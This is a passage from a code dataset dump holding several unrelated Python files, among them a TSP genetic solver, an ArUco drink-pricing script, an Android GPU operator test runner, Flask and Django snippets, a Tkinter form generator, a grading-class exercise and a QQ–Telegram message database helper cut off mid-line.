self.current_path[len(self.current_path)-1])\n\t\t\t\t\tif dist > self.MAX_DISTANCE:\n\t\t\t\t\t\tself.cities.append(next_city)\n\t\t\t\t\t\tnext_city, _ = self.closest_city(self.current_path[len(self.current_path) - 1])\n\t\t\t\t\t\tself.cities.remove(next_city)\n\t\t\t\t\t\tself.current_path.append(next_city)\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.current_path.append(next_city)\n\t\t\t\t\n\t\t\n\tdef find(self):\n\t\tself.best_path = self.find_greedy_path()\n\t\tself.best_path_distance = self.total_distance(self.best_path)\n\t\t\n\t\tbest_path_distance_formated = \"%.2f\" % self.best_path_distance\n\t\tprint(f'({best_path_distance_formated} u.d) Found best path with greedy algorithm')\n\t\tprint(f'Max distance between cities in current path: {self.MAX_DISTANCE}')\n\t\tprint(f'Min distance between cities in current path: {self.MIN_DISTANCE}')\n\t\t\n\t\tprint(f'Working with genetic algorithm...\\n')\n\t\t\n\t\tself.reset()\n\t\t\n\t\tself.print_status()\n\t\t\n\t\tself.find_genetic_path()\n\n\ncities = list()\nnumbers_of_cities = 0\n\nif len(sys.argv) == 1:\n\tprint(f'Reading from stdin')\n\tnumber_of_cities = int(sys.stdin.readline())\n\tfor i in range(number_of_cities):\n\t\tline = sys.stdin.readline().split()\n\t\tcity = (float(line[0]), float(line[1]), str(line[2]))\n\t\tcities.append(city)\nelse:\n\tfile_path = sys.argv[1]\n\tprint(f'Reading from file {file_path}')\n\tfile = open(file_path)\n\tnumber_of_cities = int(file.readline())\n\tfor line in file:\n\t\tline = line.split()\n\t\tcity = (float(line[0]), float(line[1]), str(line[2]))\n\t\tcities.append(city)\n\tfile.close()\n\ncp = CitiesPath(number_of_cities, cities)\n\ncp.find()\n","sub_path":"cities_path.py","file_name":"cities_path.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"589213617","text":"'''\nThis script identifies drinks marked with aruco markers and calculates their total cost\n\nUser variables are to be set in the 'config' file, not within the program\n\nAuthor: Fasermaler \nMarch 2019\n'''\n\nimport cv2\nimport numpy as np\n\nimport cv2.aruco as aruco\n\nimport csv\n\n# Fire base imports\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\n# Time import\nimport time\n\n# import thread to do multithreading\nimport _thread\n\n# import argparse to take in system arguments\nimport argparse\n\n# Custom imports\nfrom aruco_detector import aruco_detector\nfrom picam_class import pi_cam\nfrom video_reader import video_reader\nfrom arg_parser import arg_parser\nfrom price_calculator import price_calculator\nfrom csv_reader import csv_reader\nfrom pull_prices import pull_prices\n\n\nclass cutQ_vision_class:\n\n\tdef __init__(self, drinkp):\n\t\t# Parses the console arguments\n\t\tself.args = arg_parser()#default_imshow=False)\n\t\tself.args.parse_arguments()\n\n\t\t# start the csv reader \n\t\tself.csv_read = csv_reader()\n\n\t\t# Get the config file parameters\n\t\tself.config_read = csv_reader()\n\t\tprint(self.config_read.get_config())\n\n\t\t# If no video path was specified, use the pi camera as live feed\n\t\tif self.args.video_path == None:\n\n\t\t\tself.stream = pi_cam(self.config_read.pi_height, self.config_read.pi_width, self.config_read.pi_fps)\n\n\t\telse:\n\t\t\tself.stream = video_reader(str(self.args.video_path))\n\n\t\t# Start the aruco detector\n\t\tself.aruco_detector = aruco_detector()\n\n\t\t# Start the price calculator\n\t\tprint(drinkp)\n\t\tself.prices = price_calculator(drinkp)\n\n\n\t\tself.drinks = None\n\t\tself.price = None\n\t\tself.drink_dict = {}\n\t\t\n\n\t\t\t\t# Starts the thread to get frames\n\t\t_thread.start_new_thread(self.stream.get_frame_continuous, ())\n\n\tdef start(self):\n\n\t\treset_count = 0\n\t\t\n\t\t# encapsulate the whole program in a try except in case of termination\n\t\t# try:\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\t# get the frame from the stream\n\t\t\t\tframe = self.stream.frame\n\t\t\t\t#self.drink_dict = {}\n\n\n\n\n\t\t\t\t# get the coordinates and ids of the aruco markers\n\t\t\t\t#try:\n\n\t\t\t\tcorners, ids = self.aruco_detector.return_aruco_ids(frame)\n\t\t\t\t\n\t\t\t\tif ids != None:\n\t\t\t\t\tself.drink_dict = {}\n\n\t\t\t\t\t# calculate the prices\n\t\t\t\t\t\n\t\t\t\t\tself.prices.calculate_price(ids)\n\t\t\t\t\t\n\n\n\t\t\t\t\t# If the user opts to show the cv2 screen\n\n\t\t\t\t\tif self.args.imshow:\n\t\t\t\t\t\tprint(self.prices.drinks_list)\n\t\t\t\t\t\tself.aruco_detector.draw_markers(frame, corners, ids, text=self.prices.drinks_list, text_flag=True)\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\n\t\t\t\t\tprint(self.prices.total_price)\n\t\t\t\t\tfor i in range(len(self.drinks)):\n\t\t\t\t\t\tif self.drinks[i] not in self.drink_dict.keys():\n\t\t\t\t\t\t\tif self.drinks[i] != None:\n\t\t\t\t\t\t\t\tself.drink_dict[self.drinks[i]] = (1, self.prices.pure_prices[self.drinks[i]])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.drink_dict[self.drinks[i]] = (self.drink_dict[self.drinks[i]][0] + 1 , self.prices.pure_prices[self.drinks[i]])\n\t\t\t\t\tprint(self.drink_dict)\n\t\t\t\t\t#reset_count = 0\n\t\t\t\telse:\n\t\t\t\t\tif reset_count == 10:\n\t\t\t\t\t\tself.drink_dict = {}\n\t\t\t\t\t\treset_count = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\treset_count += 1\n\t\t\t\tcv2.imshow('Stream', frame)\n\t\t\t\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\t\t\t\tbreak\n\n\t\t\t\t# updates the main class attributes\n\t\t\t\tself.price = self.prices.total_price\n\t\t\t\tself.drinks = self.prices.drinks_list\n\n\n\n\t\t\t\t\t\n\t\t\t\t# except:\n\t\t\t\t# \t#print(\"skipped a frame\")\n\t\t\t\t# \tpass\n\t\t\texcept Exception as e: print(e)\n\n\t\t# except:\n\n\t\t# \t# terminate the stream\n\t\t# \tself.stream.terminate = True\n\n\t\tcv2.destroyAllWindows()\n\n## Test Code ##\n\n#vision = cutQ_vision_class()\n\n# Do note that this has no termination condition at the moment\n#vision.start()\n\n\n\n\n","sub_path":"vision/cutQ_vision_class.py","file_name":"cutQ_vision_class.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"145031914","text":"\"\"\"!@brief TestScript to manage(build/push/run) operators\n\"\"\"\nimport argparse\nimport subprocess\nimport sys\nimport time\nimport glob\nfrom colorama import Fore, Back, Style\n# pylint: disable=W0622 (redefined-builtin)\nfrom parse import compile\n\n\nclass TestUtils:\n \"\"\"!@brief Utilities for TestScript\n \"\"\"\n @staticmethod\n def alert_message_exit(msg, halt = True):\n \"\"\"!@brief print alert message and exit\n @param msg log message\n \"\"\"\n print('\\033[31m' + msg + '\\033[0m\\n')\n if halt:\n sys.exit(0)\n\n @staticmethod\n def log_print(msg):\n \"\"\"!@brief print log message\n @param msg log message\n \"\"\"\n print(\"=\" * 40)\n print(\"===== \" + msg + \" =====\")\n print(\"=\" * 40)\n\n @staticmethod\n def log_print_g(msg):\n \"\"\"!@brief print log message with color\n @param msg log message\n \"\"\"\n print(\"=\" * 80)\n print(Fore.GREEN + Back.BLACK + Style.BRIGHT + msg + Fore.RESET + Back.RESET + Style.RESET_ALL)\n print(\"=\" * 80)\n time.sleep(2)\n\n @staticmethod\n def shell(cmd):\n \"\"\"!@brief perform bash cmd\n \"\"\"\n process = subprocess.run(cmd, executable=\"/bin/bash\", shell=True)\n if process.returncode != 0:\n TestUtils.alert_message_exit(\"Aborted command : {}\".format(cmd), halt = False)\n\n @staticmethod\n def shell_return(cmd):\n \"\"\"!@brief perform bash cmd and return returncode\n \"\"\"\n process = subprocess.Popen(cmd, shell=True)\n process.wait()\n return process.returncode\n\n @staticmethod\n def shell_with_output(cmd):\n \"\"\"!@brief return stdout from bash cmd\n \"\"\"\n result = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n stdoutdata, unused_stderrdata = result.communicate()\n return stdoutdata\n\n\nclass TestManager:\n \"\"\"!@brief Manager of TestScript\n \"\"\"\n\n _COMMAND_LIST = {\n 'build': ['b'],\n 'push': ['p'],\n 'run': ['r'],\n 'lcov': ['c'],\n }\n\n _TARGET_LIST = {\n 'emulator': ['emul'],\n 'universal2100': ['2100'],\n }\n\n _OPERATOR_LIST = list()\n\n _ROOT_DIR = '../../../../../../../../..'\n\n _ANDROID_BP = '''cc_binary {{\n name: \"enn_gpu_op_{0}_test\",\n vendor: true,\n rtti: true,\n defaults: [\n \"enn_defaults\",\n ],\n srcs: [\n \"{0}_test.cpp\",\n ],\n static_libs: [\n \"libgtest\",\n \"libgtest_main\",\n ],\n shared_libs: [\n \"libenn_user_driver_gpu\",\n ],\n}}\\n\n'''\n\n _CMAKELISTS_TXT = '''set(SOURCE_FILES {0}_test.cpp ../operators/{1}/{1}.cpp)\nadd_executable(enn_gpu_op_{0}_test ${{SOURCE_FILES}})\ntarget_link_libraries(enn_gpu_op_{0}_test ${{LIBRARY_FILES}})\nadd_test(NAME {0}_test COMMAND enn_gpu_op_{0}_test)\\n\n'''\n\n _LCOV = 'lcov --capture --directory build/CMakeFiles/enn_gpu_op_{0}.dir/ --output-file coverage/{0}_coverage.info'\n _GEN_HTML = 'genhtml coverage/{0}_coverage.info --output-directory coverage/{0}_coverage'\n\n _LCOV_FILTER = \"'/usr/include/*' '*/userdriver/common/*' '*/userdriver/gpu/op_test/*' \\\n '*/userdriver/gpu/common/*.hpp'\"\n _LCOV_INTEG_RAW = \"lcov --capture --directory build/CMakeFiles/ -o coverage/gpu_op_test_coverage.raw\"\n _LCOV_INTEG = \"lcov -r coverage/gpu_op_test_coverage.raw {} -o coverage/gpu_op_test_coverage.info\".format(_LCOV_FILTER)\n _GEN_HTML_INTEG = \"genhtml coverage/gpu_op_test_coverage.info --output-directory coverage/gpu_op_test_coverage\"\n\n def __init__(self):\n # Collect test list\n temp_op_list = glob.glob('*_test.cpp')\n for top in temp_op_list:\n self._OPERATOR_LIST.append(top.replace('test/', '').replace('_test.cpp', ''))\n self._OPERATOR_LIST.sort()\n\n def parse_args(self):\n \"\"\"!@brief return parsed arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='\\033[31m** CPU userdriver operator UnitTest Script **\\033[0m')\n parser.add_argument('--command', '-c', dest='command', default='run',\n help='select command {}'.format(TestManager._COMMAND_LIST.keys()))\n parser.add_argument('--target', '-t', dest='target', default='universal2100',\n help='select target {}'.format(TestManager._TARGET_LIST.keys()))\n parser.add_argument('operator', nargs='*',\n help='select operator {}'.format(self._OPERATOR_LIST))\n args = parser.parse_args()\n\n # Check invalid command\n if args.command not in TestManager._COMMAND_LIST.keys():\n TestUtils.alert_message_exit('Invalid command : {}'.format(args.command))\n\n # Check invalid target\n if args.target not in TestManager._TARGET_LIST.keys():\n TestUtils.alert_message_exit('Invalid target : {}'.format(args.target))\n\n # Check invalid test name\n for operator in args.operator:\n if operator == 'all':\n args.operator = self._OPERATOR_LIST\n break\n if operator not in self._OPERATOR_LIST:\n TestUtils.alert_message_exit('Invalid operator : {}'.format(operator))\n\n return args\n\n def process_build(self, args):\n \"\"\"!@brief perform build CPU operator unittest\n \"\"\"\n if args.target == 'emulator':\n # Generate CMakeLists.txt with test list\n if args.operator:\n print('Build operator :', args.operator)\n with open('CMakeLists.base') as base_file:\n with open('CMakeLists.txt', 'w+') as txt_file:\n txt_file.write(base_file.read())\n for operator in args.operator:\n class_name = self.get_class_name(operator)\n if class_name:\n txt_file.write(TestManager._CMAKELISTS_TXT.format(operator, class_name))\n\n # Emulator build for linux\n TestUtils.shell('mkdir build;\\\n cd build;\\\n cmake .. -DUNIT_TEST=true;\\\n make;\\\n cd -')\n else:\n # Generate Android.bp with test list\n if args.operator:\n print('Build operator :', args.operator)\n with open('Android.bp', 'w+') as bp_file:\n for operator in args.operator:\n bp_file.write(TestManager._ANDROID_BP.format(operator))\n\n # Run build\n print(\"&&&&&&&\\n\")\n TestUtils.shell('source {0}/build/envsetup.sh;\\\n lunch full_{1}_r-eng;\\\n cd ../../..;\\\n mm -j16;\\\n cd -'.format(TestManager._ROOT_DIR, args.target))\n\n # pylint: disable=R0201 (no-self-use)\n def process_push(self, args):\n \"\"\"!@brief perform push CPU operator unittest file and library\n \"\"\"\n if not args.operator:\n TestUtils.alert_message_exit('Please input operator to push in device')\n\n if args.target == 'emulator':\n print('\\033[31mEmulator target do not push any files!!!\\033[0m')\n else:\n cmd = 'cd {0}/out/target/product/{1}/vendor/; adb root; adb remount;\\\n adb push lib /vendor/; adb push lib64 /vendor/;'.format(TestManager._ROOT_DIR, args.target)\n print('Push operator :', args.operator)\n for operator in args.operator:\n cmd += 'adb push bin/enn_gpu_op_{}_test /vendor/bin/;'.format(operator)\n cmd += 'cd -'\n print(\"cmd\", cmd)\n TestUtils.shell(cmd)\n\n # pylint: disable=R0201 (no-self-use)\n def process_run_test(self, args):\n \"\"\"!@brief perform execute CPU operator unittest\n \"\"\"\n if args.target == 'emulator':\n TestUtils.shell('cd build;\\\n ctest --output-on-failure;\\\n cd -')\n else:\n if not args.operator:\n TestUtils.alert_message_exit('Please input operator to run test')\n\n print('Test operator :', args.operator)\n for operator in args.operator:\n print('\\n\\033[33m************ Run enn_gpu_op_{}_test ************\\033[0m'.format(operator))\n TestUtils.shell('adb shell enn_gpu_op_{}_test;'.format(operator))\n\n # pylint: disable=R0201 (no-self-use)\n def get_class_name(self, operator):\n \"\"\"!@brief get operator class name from test file\n \"\"\"\n with open('{0}_test.cpp'.format(operator)) as test_file:\n pattern = compile('#include \"{path}/{class}/{class}.hpp\"\\n')\n for line in test_file.readlines():\n parsed = pattern.parse(line)\n if parsed:\n return parsed['class']\n return None\n\n def process_coverage_test(self, args):\n \"\"\"!@brief perform execute gpu operator unittest\n \"\"\"\n if args.target == 'emulator':\n self.process_run_test(args)\n TestUtils.shell('mkdir -p coverage')\n test_dir_list = glob.glob('build/CMakeFiles/enn_gpu_op_*.dir')\n pattern = compile('build/CMakeFiles/enn_gpu_op_{op_test}.dir')\n for test_dir in test_dir_list:\n test_name = pattern.parse(test_dir)['op_test']\n if test_name:\n TestUtils.shell(TestManager._LCOV.format(test_name))\n TestUtils.shell(TestManager._GEN_HTML.format(test_name))\n else:\n TestUtils.alert_message_exit('Not support yet for device!!!')\n\n def process_coverage_test_integ(self, args):\n \"\"\"!@brief perform execute CPU operator unittest (integrated)\n \"\"\"\n if args.target == 'emulator':\n self.process_run_test(args)\n TestUtils.shell('mkdir -p coverage')\n TestUtils.shell(TestManager._LCOV_INTEG_RAW)\n TestUtils.shell(TestManager._LCOV_INTEG)\n TestUtils.shell(TestManager._GEN_HTML_INTEG)\n else:\n TestUtils.alert_message_exit('Not support yet for device!!!')\n\n\ndef main():\n \"\"\"!@brief Entrypoint\n \"\"\"\n test_manager = TestManager()\n args = test_manager.parse_args()\n if args.command == 'build':\n test_manager.process_build(args)\n elif args.command == 'push':\n test_manager.process_push(args)\n elif args.command == 'lcov':\n test_manager.process_coverage_test_integ(args)\n else:\n test_manager.process_run_test(args)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/userdriver/gpu/op_test/gpu_op_test.py","file_name":"gpu_op_test.py","file_ext":"py","file_size_in_byte":10670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"111485612","text":"from django.conf.urls import url\nfrom income_statements import views\n\n\nurlpatterns = [\n url(r'^api/incomes$', views.income_list),\n url(r'^api/incomes/(?P[\\w\\-]+)$', views.symbol_income_list),\n url(r'^api/incomes/(?P[\\w\\-]+)/(?P[0-9]+)$', views.symbol_income_detail),\n url(r'^api/income_init/annualReport$', views.income_init_annual),\n url(r'^api/income_init/quarterlyReport$', views.income_init_quarterly),\n]\n","sub_path":"income_statements/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"300457417","text":"miLista=[\"juan\",5,\"Esteban\"]\n\nprint(miLista[2])\n\n\n\n#para acceder a porciones de listas muy grandes \nprint(miLista[0:3])#el ultimo indice no se incluye en el rango de la porcion\n\nprint(miLista[2:])#de esta forma se indica que partira del indice 2 hasta el final de la lista\n\n\n##para agregar un elemento mas a la lista luego de ser declarada\nmiLista.append(\"maria\")##lo agrega al final de la lista\n\nmiLista.insert(2,\"luis\")#lo inserta en el indice especificado\n\nmiLista.extends([\"martha\",\"emelina\",\"henry\"])##para agregar varios elementos a la ves . Los concatena con la lista original\n\nmiLista.remove(\"emelina\")#para remover un elemento de la lista\n\nmiLista.pop()#para eliminar el ultimo elemento de una lista\n\nprint(miLista.index(2))#para acceder a un indice en especifico\n\n\n#-------------------------------------------\n\nmiLista2=[\"Sandre\",\"Lucia\"]\n\nmiLista3=miLista+miLista2 #para sumar listas \n\nprint(miLista3[:])","sub_path":"listas(arrays).py","file_name":"listas(arrays).py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"228308664","text":"class Solution:\n def minCost(self, costs: List[List[int]]) -> int:\n n = len(costs)\n if n == 0:\n return 0\n f = [[0] * 3 for _ in range(n+1)]\n for i in range(1, n + 1):\n for j in range(3):\n f[i][j] = sys.maxsize\n for k in range(3):\n if j != k:\n f[i][j] = min(f[i][j], f[i - 1][k] + costs[i-1][j])\n\n return min(f[len(costs)][0], min(f[len(costs)][1], f[len(costs)][2]))\n","sub_path":"Chapter07_dynamicProgramming/lc256.py","file_name":"lc256.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"258979546","text":"import sqlite3\n\nimport click\nfrom flask import current_app, g\nfrom flask.cli import with_appcontext\n\n\ndef get_db():\n # g is a special object, unique for each request. Used to store data that multiple functions might need. \n # Reused if get_db() is called more than once in the same request\n if 'db' not in g:\n # sqlite3.connect() establishes a connection to the file pointed at by the DATABASE config key\n g.db = sqlite3.connect(\n # current_app is a special object that points to the Flask app handling the request\n current_app.config['DATABASE'],\n detect_types=sqlite3.PARSE_DECLTYPES\n )\n # sqlite3.Row tells connection to return rows that behave like dicts\n g.db.row_factory = sqlite3.Row\n\n return g.db\n\ndef close_db(e=None):\n # check if connection was created\n db = g.pop('db', None)\n\n # if db exists, close it\n if db is not None:\n db.close()\n\ndef init_db():\n db = get_db()\n\n # open_resource opens file relative to flaskr package\n with current_app.open_resource('schema.sql') as f:\n db.executescript(f.read().decode('utf8'))\n\n# click.command defines command line command called 'init-db' that calls init_db_command()\n@click.command('init-db')\n@with_appcontext\ndef init_db_command():\n \"\"\"Clear the existing data and create new tables.\"\"\"\n init_db()\n click.echo('Initialized the database.')\n\n\ndef init_app(app):\n # tells Flask to call close_db() when cleaning up\n app.teardown_appcontext(close_db)\n # adds new command that can be called with the `flask` command\n app.cli.add_command(init_db_command)","sub_path":"flaskr/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"14409499","text":"from platform import system\nimport json\n# from tkinter import Tk, Label, Button, Grid, grid_rowconfigure, Entry, IntVar, END, W, E, filedialog, Toplevel\nfrom tkinter import *\nfrom tkinter import Entry, filedialog\n\n\nclass PyDoc:\n\n def __init__(self, master):\n self.master = master\n master.title(\"Requests\")\n\n self.label = Label(master, text=\"Text\")\n self.filepath = \"\"\n\n self.lambda_button = Button(master, text=\"lambda\", command=lambda: self.update(\"lambda\"))\n self.open_button = Button(master, text=\"open\", command=lambda: self.update(\"open\"))\n self.viewing_session_button = Button(master, text=\"Viewing Session\", command=lambda: self.update(\"Viewing Session\"))\n # LAYOUT\n\n self.label.grid(row=0, column=0, sticky=W)\n self.viewing_session_button.grid(row=2, column=3)\n # self.entry.grid(row=1, column=0, columnspan=3, sticky=W+E)\n\n self.open_button.grid(row=1, column=2)\n\n def update(self, method):\n if method == \"open\":\n initialdir = \"/\" if (system() == \"Linux\") else \"C:/\"\n\n self.filepath = filedialog.askopenfilename(initialdir=initialdir, filetypes=((\"jpeg files\",\"*.jpg\"),(\"all files\",\"*.*\")))\n elif method == \"Viewing Session\":\n with open('viewing_session.json', 'r') as file:\n data = json.load(file)\n Request_Window(Toplevel(self.master), data=data)\n else:\n pass\n\n\nclass Request_Window(Grid):\n\n def __init__(self, master, title=\"New Window\", data={}):\n\n self.master = master\n master.title = title\n self.vcmd = master.register(self.validate)\n self.count = 0\n self.labels = {}\n self.entries = {}\n self.gen_window_from_json(data)\n\n def gen_window_from_json(self, raw_data, depth=0):\n for item in raw_data:\n self.count += 1\n if type(raw_data[item]) is dict:\n self.labels[item] = self.new_label(item, depth)\n self.gen_window_from_json(raw_data[item], depth + 1)\n\n else:\n self.labels[item] = self.new_label(item, depth)\n self.entries[item] = self.new_entry(raw_data[item], depth)\n\n def new_label(self, item=\"\", depth=0):\n new_label = Label(self.master, text=item)\n new_label.grid(row=self.count, column=depth, sticky='W')\n return new_label\n\n def new_entry(self, item=\"\", depth=0):\n new_entry = Entry(self.master, validate=\"key\", validatecommand=(self.vcmd, '%P'))\n new_entry.grid(row=self.count, column=depth + 1, sticky='W')\n new_entry.insert(index=0, string=item)\n entered_text = new_entry.get()\n print(entered_text)\n # new_entry.insert(index=0, string=\"newdata\")\n return new_entry\n\n def validate(self, new_text):\n if not new_text: # the field is being cleared\n self.data = 0\n return True\n\n try:\n self.data= new_text\n return True\n except ValueError:\n return False\n\n\nroot = Tk()\nPyDoc = PyDoc(root)\nroot.mainloop()\n\n","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"135642404","text":"class Student:\n def __init__(self, name, surname, gender):\n self.name = name\n self.surname = surname\n self.gender = gender\n self.finished_courses = []\n self.courses_in_progress = []\n self.grades = {}\n\n def average_rating_course(self, course):\n crutch = 0\n crutch_2 = []\n for search in self.grades[course]:\n crutch += search\n crutch_2.append(search)\n return float(crutch / len(crutch_2))\n\n def average_rating(self):\n crutch = 0\n crutch_2 = []\n for search in self.grades:\n for search_2 in self.grades[search]:\n crutch += search_2\n crutch_2.append(search_2)\n return float(crutch / len(crutch_2))\n\n def __lt__(self, other):\n if isinstance(other, Student):\n return self.average_rating() < other.average_rating()\n else:\n return \"Ошибка\"\n\n def rating_comparison(self, student):\n if isinstance(student, Student):\n if student < self:\n return f\"{self.name} {self.surname}\"\n elif self < student:\n return f\"{student.name} {student.surname}\"\n else:\n return \"средний бал равен\"\n else:\n return \"ошибка\"\n\n def __str__(self):\n return f\"Имя: {self.name} \\n\" \\\n f\"Фамилия: {self.surname} \\n\" \\\n f\"Средняя оценка за лекции: {self.average_rating()} \\n\" \\\n f\"Курсы в процессе изучения: {str(self.courses_in_progress)[1:-1]} \\n\" \\\n f\"Завершенные курсы: {str(self.finished_courses)[1:-1]}\"\n\n\nclass Mentor:\n def __init__(self, name, surname):\n self.name = name\n self.surname = surname\n self.courses_attached = []\n\n\nclass Lecturer(Mentor):\n def __init__(self, name, surname):\n super().__init__(name, surname)\n self.grades = {}\n\n def average_rating(self):\n crutch = 0\n crutch_2 = []\n for search in self.grades:\n for search_2 in self.grades[search]:\n crutch += search_2\n crutch_2.append(search_2)\n return float(crutch / len(crutch_2))\n\n def average_rating_course(self, course):\n crutch = 0\n crutch_2 = []\n for search in self.grades[course]:\n crutch += search\n crutch_2.append(search)\n return float(crutch / len(crutch_2))\n\n def __lt__(self, other):\n if isinstance(other, Lecturer):\n return self.average_rating() < other.average_rating()\n else:\n return \"Ошибка\"\n\n def rating_comparison(self, lecturer):\n if isinstance(lecturer, Lecturer):\n if lecturer < self:\n return f\"{self.name} {self.surname}\"\n elif self < lecturer:\n return f\"{lecturer.name} {lecturer.surname}\"\n else:\n return \"средний бал равен\"\n else:\n return \"ошибка\"\n\n def __str__(self):\n return f\"Имя: {self.name} \\n\" \\\n f\"Фамилия: {self.surname} \\n\" \\\n f\"Средняя оценка за лекции: {self.average_rating()}\"\n\n def rate_class(self, student, course, grade):\n if isinstance(student, Student) and course in self.courses_attached and course in student.courses_in_progress:\n if course in self.grades:\n self.grades[course] += [grade]\n else:\n self.grades[course] = [grade]\n else:\n return 'Ошибка'\n\n\nclass Reviewer(Mentor):\n def __init__(self, name, surname):\n super().__init__(name, surname)\n\n def rate_hw(self, student, course, grade):\n if isinstance(student, Student) and course in self.courses_attached and course in student.courses_in_progress:\n if course in student.grades:\n student.grades[course] += [grade]\n else:\n student.grades[course] = [grade]\n else:\n return 'Ошибка'\n\n def __str__(self):\n return f\"Имя: {self.name} \\n\" \\\n f\"Фамилия: {self.surname}\"\n\n\ndef all_students_average_rating(students, course):\n crutch = []\n for search in students:\n if isinstance(search, Student):\n crutch.append(search.average_rating_course(course))\n else:\n return \"Ошибка\"\n crutch.sort()\n return crutch[-1]\n\n\ndef all_lecturer_average_rating(lecturers, course):\n crutch = []\n for search in lecturers:\n if isinstance(search, Lecturer):\n crutch.append(search.average_rating_course(course))\n else:\n return \"Ошибка\"\n crutch.sort()\n return crutch[-1]\n\n\nfirst_reviewer = Reviewer(\"Mr\", \"Check\")\n\nsecond_reviewer = Reviewer(\"Miss\", \"Check\")\n\nfirst_lecturer = Lecturer(\"Mr\", \"Teacher\")\nfirst_lecturer.grades = {\"Python\": [3, 4, 5, 6], \"Git\": [4]}\n\nsecond_lecturer = Lecturer(\"Miss\", \"Teacher\")\nsecond_lecturer.grades = {\"Python\": [7, 8, 10, 10], \"Git\": [9]}\n\nfirst_student = Student('Ruoy', 'Eman', 'your_gender')\nfirst_student.finished_courses = [\"Введение в программирование\"]\nfirst_student.courses_in_progress = [\"Python\", \"Git\"]\nfirst_student.grades = {\"Python\": [3, 4, 5, 6], \"Git\": [4]}\n\nsecond_student = Student(\"Hidetaka\", \"Miyazaki\", \"your_gender\")\nsecond_student.finished_courses = [\"Введение в программирование\"]\nsecond_student.courses_in_progress = [\"Python\", \"Git\"]\nsecond_student.grades = {\"Python\": [1, 1, 1, 0], \"Git\": [2]}\n\nfirst_lecturer.rate_class(first_student, 'Python', 10)\nfirst_reviewer.rate_hw(first_student, 'Python', 10)\n\nstudents_list = [first_student, second_student]\nlecturer_list = [first_lecturer, second_lecturer]\n\n\nprint(first_lecturer.grades)\nprint(first_student.grades)\nprint(first_student)\nprint(first_lecturer)\nprint(first_reviewer)\nprint(first_student.rating_comparison(second_student))\nprint(first_lecturer.rating_comparison(second_lecturer))\nprint(all_students_average_rating(students_list, \"Python\"))\nprint(all_lecturer_average_rating(lecturer_list, \"Python\"))\n","sub_path":"3adanie 4.py","file_name":"3adanie 4.py","file_ext":"py","file_size_in_byte":6263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"172912019","text":"from api.controllers.user.userService import UserService\nimport unittest\nclass UserServiceTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n dictMock= {\n \"nome\": \"a\",\n \"email\": \"a\",\n \"telefone\": \"a\",\n \"telefone2\": \"a\",\n \"nome_empresa\": \"a\",\n \"cpf_cnpj\": \"a\",\n \"data_nascimento\": \"1995-06-12\",\n \"sexo\": \"M\",\n \"senha\": \"a\",\n \"login\": \"a\"\n } \n cls.dictMock=dictMock\n \n\n @classmethod\n def tearDownClass(cls):\n cls.dictMock=None\n\n def test_payload_is_dict(self):\n self.assertTrue(UserService().validateTypePayload(type(self.dictMock)),\"payload deve ser um json\")\n\n def test_validate_payload(self):\n self.assertTrue(UserService().createUser(self.dictMock),\"payload nao pode ter campo vazio\")\n","sub_path":"apiTests/userServiceTest.py","file_name":"userServiceTest.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"140747129","text":"import sqlite3\nimport datetime\nimport time\nfrom bot_constant import FORWARD_LIST\nimport logging\n\nlogger = logging.getLogger(\"CTB.\" + __name__)\n\n\nclass MessageDB:\n def __init__(self, db_name: str):\n self.conn = sqlite3.connect(db_name, check_same_thread=False)\n self.cursor = self.conn.cursor()\n for idx, forward in enumerate(FORWARD_LIST):\n table_name = '_' + str(idx)\n self.cursor.execute(f\"SELECT count(*) FROM sqlite_master WHERE type='table' AND name='{table_name}';\")\n result = self.cursor.fetchall()\n if result[0][0]:\n pass\n else:\n self.cursor.execute(f\"create table {table_name} (tg_message_id int primary key,\"\n f\"qq_message_id int, qq_number int, timestamp int)\")\n self.conn.commit()\n\n def append_message(self, qq_message_id: int,\n tg_message_id: int,\n forward_index: int,\n qq_number: int):\n \"\"\"\n append qq message list to database\n :param qq_message_id: QQ message id\n :param tg_message_id: Telegram message id\n :param forward_index: forward index\n :param qq_number: If from QQ, then QQ sender's number. If from Telegram, then 0 (used for recall)\n :return:\n \"\"\"\n table_name = '_' + str(forward_index)\n timestamp = int(time.mktime(datetime.datetime.now().timetuple()))\n logger.debug(f'append tg_msg_id:{tg_message_id}, qq_msg_id:{qq_message_id}, '\n f'qq_num:{qq_number}, time:{timestamp} to {table_name}')\n\n # find if already exists\n self.cursor.execute(f\"select * from '{table_name}' where tg_message_id = ?\", (tg_message_id,))\n result = self.cursor.fetchall()\n if len(result): # if exists, update record\n self.cursor.execute(\n f\"update '{table_name}' set qq_message_id=?, 